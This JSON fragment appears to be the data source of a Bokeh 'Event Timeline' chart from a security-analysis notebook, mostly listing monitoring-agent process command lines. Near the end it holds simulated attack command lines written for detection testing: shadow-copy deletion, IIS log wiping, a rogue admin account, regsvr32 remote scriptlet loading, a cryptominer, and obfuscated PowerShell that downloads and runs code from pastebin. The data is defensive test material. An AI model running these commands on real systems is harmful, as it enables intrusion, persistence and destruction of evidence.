/nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"taskhostw.exe SYSTEM\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\ICT\\n2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\ICT\\n2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\ICT\\n2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\Resources\\\\222\\\\pmfexe.exe\\\" -PerfMode optimize\\n-quickscan -event -json -alldetectors\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\"],\"TimeGenerated\":{\"__ndarray__\":\"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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[203]},\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,70,71,72,73,74,75,83,84,86,87,88,95,133,134,135,179,180,181,182,183,184,185,186,187,188,189,219,220,228,229,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"4911\"},\"selection_policy\":{\"id\":\"4910\"}},\"id\":\"4811\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"4836\",\"type\":\"PanTool\"},{\"attributes\":{\"bottom_units\":\"screen\",\"coordinates\":null,\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"group\":null,\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"4837\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"coordinates\":null,\"formatter\":{\"id\":\"4881\"},\"group\":null,\"major_label_policy\":{\"id\":\"4905\"},\"ticker\":{\"id\":\"4825\"}},\"id\":\"4824\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"Event Timeline\"},\"id\":\"4814\",\"type\":\"Title\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"4832\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"axis\":{\"id\":\"4828\"},\"coordinates\":null,\"dimension\":1,\"grid_line_color\":null,\"group\":null,\"ticker\":null},\"id\":\"4831\",\"type\":\"Grid\"},{\"attributes\":{\"axis\":{\"id\":\"4824\"},\"coordinates\":null,\"group\":null,\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"4827\",\"type\":\"Grid\"},{\"attributes\":{\"tools\":[{\"id\":\"4812\"},{\"id\":\"4832\"},{\"id\":\"4833\"},{\"id\":\"4834\"},{\"id\":\"4835\"},{\"id\":\"4836\"}]},\"id\":\"4838\",\"type\":\"Toolbar\"},{\"attributes\":{\"data\":{\"CommandLine\":[\".\\\\reg not /domain:everything that /sid:shines is\\n/krbtgt:golden !\",\"cmd /c \\\"systeminfo && systeminfo\\\"\",\".\\\\rundll32 /C 42424.exe\",\"42424.exe\",\".\\\\rundll32 /C c:\\\\users\\\\MSTICAdmin\\\\42424.exe\",\".\\\\rundll32 /C 1234.exe\",\"1234.exe\",\".\\\\rundll32 /C c:\\\\users\\\\MSTICAdmin\\\\1234.exe\",\".\\\\rundll32 /C reg.exe\",\"reg.exe\",\".\\\\reg.exe add\\n\\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"c:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe C:\\\\Users\\\\MSTI\\nCAdmin\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-01DD7.tmp\\\\tsetup.1.\\n0.14.tmp\\\" /SL5=\\\"$250276,19992586,423424,C:\\\\Users\\\\M\\nSTICAdmin\\\\Downloads\\\\tsetup.1.0.14.exe\",\".\\\\rundll32.exe /C mshtml,RunHTMLApplication\\njavascript:alert(tada!)\",\".\\\\netsh.exe \\\"in (*.exe) do start # artificial\\ncommandline solely for purposes of triggering\\ntest\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell\\nSet-ExecutionPolicy RemoteSigned&echo [S]&cd&echo\\n[E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell\\nEnable-WSManCredSSP =2013Role Server -force&echo\\n[S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell\\nwinrm set winrm/config/service/Auth\\n@{Kerberos=003D\\\"true\\\"}&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\ProgramData\\\"© \\\\\\\\[REDACTED\\n]\\\\c$\\\\users\\\\[REDACTED]\\\\Documents\\\\\\\"Password Change\\nDates.docx\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\s\\nystem32\\\\inetsrv\\\\appcmd set config \\\"Default Web\\nSite/\\\" /section:httplogging /dontLog:true&echo\\n[S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&del\\nC:\\\\inetpub\\\\logs\\\\logFiles\\\\W3SVC1\\\\*.log /q&echo\\n[S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"c:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"c:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"vssadmin delete shadows /all /quiet\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"cmd /c echo Any questions about the commands\\nexecuted here then please contact one of\",\"cmd /c echo timb@microsoft.com;\\nromead@microsoft.com; ianhelle@microsoft.com;\\nmarcook@microsoft.com; dotanp@microsoft.com;\\nliengli@microsoft.com\",\"net user adm1nistrator Bob_testing /add\",\"C:\\\\Windows\\\\system32\\\\net1 user adm1nistrator\\nBob_testing /add\",\"net share TestShare=c:\\\\testshare\\n/Grant:Users,Read\",\"C:\\\\Windows\\\\system32\\\\net1 share\\nTestShare=c:\\\\testshare /Grant:Users,Read\",\"net use q: \\\\\\\\MSTICAlertsWin1\\\\TestShare\\nBob_testing /User:adm1nistrator\",\"net use q: /delete\",\"net share TestShare /delete\",\"C:\\\\Windows\\\\system32\\\\net1 share TestShare /delete\",\"net user adm1nistrator /delete\",\"C:\\\\Windows\\\\system32\\\\net1 user adm1nistrator\\n/delete\",\".\\\\regsvr32 /s /n /u /i:http://server/file.sct\\nscrobj.dll\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\suchost.exe -a cryptonight -o bcn -u\\nbond007.01 -p x -t 4\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"cmd /c \\\"echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\n>> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"cmd /c \\\"echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\n>> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`\\nC`li`en`t).DownloadFile('https://blah/png','google\\n.png')}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\powershell.exe -c \\\"$a =\\n'Download'+'String'+\\\"(('ht'+'tp://paste'+\\n'bin/'+'raw/'+'pqCwEm17'))\\\";$b = '(New-Object' + '\\nNet.WebClient)';'$b.$a' | Out-File .\\\\evil.ps1;\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\powershell -c {IEX (New-Object\\nNet.WebClient).DownloadString(('ht'+(\\\"{2}{0}{1}\\\"-f\\n':/','/paste','tp')+'bin/'+'raw/'+(\\\"{1}{0}\\\"-f'Em17\\n','pqCw')));}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"cmd /c \\\".\\\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy\\nBYpa^sS i^mPOr^T-^M^oDuLE\\nbiTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^\\n'http://somedomain/best-kitten-names-1.jpg'\\n^-d^EStIN^At^IOn ^'C:\\\\Users\\\\$env:UserName\\\\AppData\\\\\\nLocal\\\\Temp\\\\kittens1.jpg';\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"cmd /c \\\".\\\\n^e^t u^se^r\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\powershell -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0\\nACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAc\\ngBlAHMAcwBpAG8AbgAnACkAIAAkAHQA\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"cmd /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\n>> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"cmd /c \\\"echo # 